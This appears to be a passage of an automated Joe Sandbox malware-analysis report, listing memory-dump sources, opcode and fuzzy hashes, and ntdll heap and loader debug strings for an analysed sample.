                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                      • API String ID: 0-1391187441
                                                      • Opcode ID: b87178a9155e6d583252bcda344be17d11daf6058127c3cc579dc6b2afdfcd2d
                                                      • Instruction ID: 5bd05e9d91427a61d9d4e7b5eab484b9d3b2811cd76c5eaff0032b52d619933a
                                                      • Opcode Fuzzy Hash: b87178a9155e6d583252bcda344be17d11daf6058127c3cc579dc6b2afdfcd2d
                                                      • Instruction Fuzzy Hash: 5431D076610208EFD702CB59C988FAABBB9EF54770F204465E814EF290DB35ED40CE61
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: b232494054e9b524e3b30a6b78350e3aab64b1bd4cd078622959dee3652def74
                                                      • Instruction ID: 38f58496213c8352f335dafb31150294b900c6423c9a595d264aa192211098c7
                                                      • Opcode Fuzzy Hash: b232494054e9b524e3b30a6b78350e3aab64b1bd4cd078622959dee3652def74
                                                      • Instruction Fuzzy Hash: 1051CE35E00609FFEB05CF68CC48BADB7B5BF24365F10406AE55293290EB78A911CF91
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: 6731d657c2c2808b78728009c7e7ea8e9982229b8fe770feddf3a916d1393c50
                                                      • Instruction ID: 5a05a6f08c1494b2876b7f2f26b04b1e9b7fbecd29d6e49929ccd361d6b8342f
                                                      • Opcode Fuzzy Hash: 6731d657c2c2808b78728009c7e7ea8e9982229b8fe770feddf3a916d1393c50
                                                      • Instruction Fuzzy Hash: D7517A7560061AEFDB05DF68C884B9ABBB1FF5C320F144065E815A7B90DB74B911CF90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID:
                                                      • API String ID: 3446177414-0
                                                      • Opcode ID: a63f07ab1a272fb9b139038eb46943ad69cf448968ec6d6c1de946e967ad4464
                                                      • Instruction ID: 37d43ec2643d9d54544b2286e8eed19e61c48987f6db36ad794b4f53e1d8f494
                                                      • Opcode Fuzzy Hash: a63f07ab1a272fb9b139038eb46943ad69cf448968ec6d6c1de946e967ad4464
                                                      • Instruction Fuzzy Hash: 6F31C2B5E0461ACFDB01CF99D844AADFBF5BB58751F14812AE811B3250DB38A941DF60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      • API String ID: 0-3178619729
                                                      • Opcode ID: 2b99736a47fb21b12f7c1f2f6a13bcc69e5936cecea200b67e0f4c1e4d5f4579
                                                      • Instruction ID: 70b57e132b2909c12273cafc0a30515841318ef4f037b4182fcfc0a0f107d48d
                                                      • Opcode Fuzzy Hash: 2b99736a47fb21b12f7c1f2f6a13bcc69e5936cecea200b67e0f4c1e4d5f4579
                                                      • Instruction Fuzzy Hash: 552220B4600245EFEB01CF28C898B7ABBB5FF25318F148499E5558B381EB35E881CB51
                                                      Strings
                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 37801728
                                                      • HEAP: , xrefs: 37801596
                                                      • HEAP[%wZ]: , xrefs: 37801712
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      • API String ID: 0-3178619729
                                                      • Opcode ID: f9870a669cd60dd13d7396378b9da8f51faaf80988e035194b37d7bfd5751e58
                                                      • Instruction ID: bf46789655fd7faf9928fb949f4e0393d53cfbc72107c737b39ae9462e97da6e
                                                      • Opcode Fuzzy Hash: f9870a669cd60dd13d7396378b9da8f51faaf80988e035194b37d7bfd5751e58
                                                      • Instruction Fuzzy Hash: 7CE1DD74A04745AFEB15CF68C891BBEBBE2AF68320F14855DE496CB245EB34E840CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                      • API String ID: 0-2391371766
                                                      • Opcode ID: eab6e0b194f86ee62f7ce2a1a508ae570b0b200a2ec456a51f5140a82506c970
                                                      • Instruction ID: 762c013ed4a9b68cabd0d6fabc5f6e6c48c566c74e23b96e8b56ab2a4513cc7d
                                                      • Opcode Fuzzy Hash: eab6e0b194f86ee62f7ce2a1a508ae570b0b200a2ec456a51f5140a82506c970
                                                      • Instruction Fuzzy Hash: 98B1BFB1604745BFE311DE55CC80F6BB7E8EB68760F410929FA58AB640D778E804CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                      • API String ID: 0-318774311
                                                      • Opcode ID: 572e1928907155042d4efd4d8dc60ef993de0bde655b60b10e2fc6449f8f204b
                                                      • Instruction ID: d708f316809664858128ad51b3961567ab1b5d30a0bfb73bc0cd7c38a3a74b8a
                                                      • Opcode Fuzzy Hash: 572e1928907155042d4efd4d8dc60ef993de0bde655b60b10e2fc6449f8f204b
                                                      • Instruction Fuzzy Hash: 02817EB5608345AFE311CF15C844BAAB7E8EF9A750F40093DF9949B790DB74E904CB52
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                      • API String ID: 0-3870751728
                                                      • Opcode ID: fe93ff31ad872413048cccaceec8a2a560baa1b9b976d3ba93a88adc4ae86501
                                                      • Instruction ID: c96dc3c6cb98ee7292f2e8134e98226e36740719947fb54c83dcd3d8448ce926
                                                      • Opcode Fuzzy Hash: fe93ff31ad872413048cccaceec8a2a560baa1b9b976d3ba93a88adc4ae86501
                                                      • Instruction Fuzzy Hash: 6D914BB4E00219AFEB14CFA8C480BADBBB1BF58354F14C16EE914AB291E7759842CF51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$&$@
                                                      • API String ID: 0-1537733988
                                                      • Opcode ID: ff92a6335483295af2fc112ba423a0b8fbbce9d02868ead3ec53eec672ad8734
                                                      • Instruction ID: 1c8383435e013ace509e1935c352741473040f24228d35e4834640da0c1ee8dd
                                                      • Opcode Fuzzy Hash: ff92a6335483295af2fc112ba423a0b8fbbce9d02868ead3ec53eec672ad8734
                                                      • Instruction Fuzzy Hash: C671CF7860A7459FE700CF28C580B1BBBE5BFE4768F50491DE4AA57290C739E906CF92
                                                      Strings
                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 378DB82A
                                                      • TargetNtPath, xrefs: 378DB82F
                                                      • GlobalizationUserSettings, xrefs: 378DB834
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                      • API String ID: 0-505981995
                                                      • Opcode ID: fd02eb3e862ff5ccd0644983e6837d52bea2e63ffcb69d4bfd37dbd57ba52d18
                                                      • Instruction ID: 6ba4fce447fb7bbefba88bb2fe0aef2d94b2fb6be0bfce39563d6a37b8a7f2f7
                                                      • Opcode Fuzzy Hash: fd02eb3e862ff5ccd0644983e6837d52bea2e63ffcb69d4bfd37dbd57ba52d18
                                                      • Instruction Fuzzy Hash: 1D619172D41229AFDB21DF58DC88BD9BBB9EF24750F4101E5A508AB250DB74DE84CF90
                                                      Strings
                                                      • HEAP: , xrefs: 3785E6B3
                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3785E6C6
                                                      • HEAP[%wZ]: , xrefs: 3785E6A6
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                      • API String ID: 0-1340214556
                                                      • Opcode ID: a1232cadedcf0b371e1081c4d421d54e58d6ff3f9fe4c66664c23c979ad1242b
                                                      • Instruction ID: e9c3d7f476d431889b1079ab6036afcb50b7c211a6f894fb3e60b7d409ad4585
                                                      • Opcode Fuzzy Hash: a1232cadedcf0b371e1081c4d421d54e58d6ff3f9fe4c66664c23c979ad1242b
                                                      • Instruction Fuzzy Hash: 6051D375604784EFE312CBA8C988B96BBF8EF05760F0401A5E590DF792DB79E941CB11
                                                      Strings
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 3786A59A
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 3786A589
                                                      • LdrpCompleteMapModule, xrefs: 3786A590
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: fc583ff51f8ffd50ef70ab008d24941a849e45d0fb85f3408ced406206bb395a
                                                      • Instruction ID: 25f6d65145199d04f67f4a19699e7c7d88040df87ae4b4983842172b2eb8754d
                                                      • Opcode Fuzzy Hash: fc583ff51f8ffd50ef70ab008d24941a849e45d0fb85f3408ced406206bb395a
                                                      • Instruction Fuzzy Hash: A4513874B00749AFE711CF58C988B5A77E5EF20768F2402A5EA51DB6D1DB38F880CB46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                      • API String ID: 0-1151232445
                                                      • Opcode ID: d708790896a94b3b17a638b39a995866f896f2a23cdfc676bc135ef30c488f0c
                                                      • Instruction ID: 0b3e45b1bf5198c04191d84e72417bda9f07598a339afb26b90b018b957d5ff9
                                                      • Opcode Fuzzy Hash: d708790896a94b3b17a638b39a995866f896f2a23cdfc676bc135ef30c488f0c
                                                      • Instruction Fuzzy Hash: 654105B82103419FFB15CE18C5C0BF97BA19F113B8F9444AED4458F356DA76E886CB92
                                                      Strings
                                                      • LdrpAllocateTls, xrefs: 37871B40
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 37871B4A
                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 37871B39
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                      • API String ID: 0-4274184382
                                                      • Opcode ID: b72b962f273d06c7981b34d0b29a0372829dee9af13d8cd13658aaad58a832ab
                                                      • Instruction ID: 852ad1a1c2e3ed1df85786e90ff53d2c6089c6890e5395bd362f3debe5499c2a
                                                      • Opcode Fuzzy Hash: b72b962f273d06c7981b34d0b29a0372829dee9af13d8cd13658aaad58a832ab
                                                      • Instruction Fuzzy Hash: 64419AB9E01608AFDB15CFA9CC41BAEBBF5FF68714F148119E415A7600DB38A800CFA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-964947082
                                                      • Opcode ID: 24f0f8a3103d8f9e4bf30dd655c241b2cdbe8652eb2fc65dbdfed34572712468
                                                      • Instruction ID: bb7fad458f257a98a0699c9ed1992b7625c577afa10f3b76a1d0da2eb54a20e0
                                                      • Opcode Fuzzy Hash: 24f0f8a3103d8f9e4bf30dd655c241b2cdbe8652eb2fc65dbdfed34572712468
                                                      • Instruction Fuzzy Hash: D341F3B5603348AFDF20DF68D985F6A3BA4EB14360F00416AE929DB340C639E948CB52
                                                      Strings
                                                      • RtlCreateActivationContext, xrefs: 378729F9
                                                      • SXS: %s() passed the empty activation context data, xrefs: 378729FE
                                                      • Actx , xrefs: 378333AC
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                      • API String ID: 0-859632880
                                                      • Opcode ID: d270bbfb3dd857d2ba0f4253fa243061c570b832efde7fa16e11fa16fe8dd195
                                                      • Instruction ID: 7d61e61b97f803ed459c23333a0cd4181befed69c62c1efeaeb2546c27018e12
                                                      • Opcode Fuzzy Hash: d270bbfb3dd857d2ba0f4253fa243061c570b832efde7fa16e11fa16fe8dd195
                                                      • Instruction Fuzzy Hash: BB311036601345AFFB12CF59DC80F9A77A4AF68760F058469E805AF681CB34E851CBD0
                                                      Strings
                                                      • @, xrefs: 3788B670
                                                      • GlobalFlag, xrefs: 3788B68F
                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3788B632
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                      • API String ID: 0-4192008846
                                                      • Opcode ID: 36876239be668facca33d56b010a097aed69931ce9de9fa12999cb1a83c6f309
                                                      • Instruction ID: 0efc4d1346d5c4c32ec42000b29d8ae6e8854766b53e4571c619dee36f99159f
                                                      • Opcode Fuzzy Hash: 36876239be668facca33d56b010a097aed69931ce9de9fa12999cb1a83c6f309
                                                      • Instruction Fuzzy Hash: 433149B5900209BFDB00DFA8DC80BEEBBB8EB54754F400469E614A6240D774AE04CFA5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                      • API String ID: 0-1050206962
                                                      • Opcode ID: b114f6a3033d4e981164d8a8f43fd5957c9ac61d02c8e0868aa9816647979d4a
                                                      • Instruction ID: 39df60b86acbcf367c4da2e3ec0a17e3c3c7175d340a61e25a84b3dff4413435
                                                      • Opcode Fuzzy Hash: b114f6a3033d4e981164d8a8f43fd5957c9ac61d02c8e0868aa9816647979d4a
                                                      • Instruction Fuzzy Hash: D3318E72D0161DAFEB01DF98CC80EAEBBBDEB54754F414465EA10B7210E778DD048BA1
                                                      Strings
                                                      • DLL "%wZ" has TLS information at %p, xrefs: 37871A40
                                                      • minkernel\ntdll\ldrtls.c, xrefs: 37871A51
                                                      • LdrpInitializeTls, xrefs: 37871A47
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                      • API String ID: 0-931879808
                                                      • Opcode ID: fd8dbdb4c4aa82f00c70423465f845ffa1174b296ecbfd15b2840816eb8069b3
                                                      • Instruction ID: d7a66c80a55982426fbf79f90c2e086b676ac6ccb00fc16d434091db6233d9ea
                                                      • Opcode Fuzzy Hash: fd8dbdb4c4aa82f00c70423465f845ffa1174b296ecbfd15b2840816eb8069b3
                                                      • Instruction Fuzzy Hash: 8A31D575E42604BFF7108F8CCC45F6A7A78AB64BA4F150169E502B7580EB78AD058BE1
                                                      Strings
                                                      • BuildLabEx, xrefs: 3784130F
                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3784127B
                                                      • @, xrefs: 378412A5
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                      • API String ID: 0-3051831665
                                                      • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                      • Instruction ID: 00c56533257142e28bc871890b41bc30ffe764f34d9f9eebd5c72109792d84ff
                                                      • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                      • Instruction Fuzzy Hash: B0317071D0061CAFDB119F99CC40E9EBBB9EBA4760F004025E514A7160D778DA058B91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_377d0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: DebugPrintTimes
                                                      • String ID: RtlValidateHeap
                                                      • API String ID: 3446177414-1797218451
                                                      • Opcode ID: 0a9471c19fc81df71524b94d735d996a74db0161dc12c4f75bd0f4c4f1921c02
                                                      • Instruction ID: 2550507b7bc27223ba4788b7e8a79af3a0cc2e1385b67ec9547269ef4dfaf420
                                                      • Opcode Fuzzy Hash: 0a9471c19fc81df71524b94d735d996a74db0161dc12c4f75bd0f4c4f1921c02
                                                      • Instruction Fuzzy Hash: 0B41F376B003459FDB02CF68C9D07EDBBA2BF54274F44825DD421AB380CB399901DB92
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 377D0000, based on PE: true
                                                      • Associated: 00000007.00000002.3145323147.00000000378F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.00000000378FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
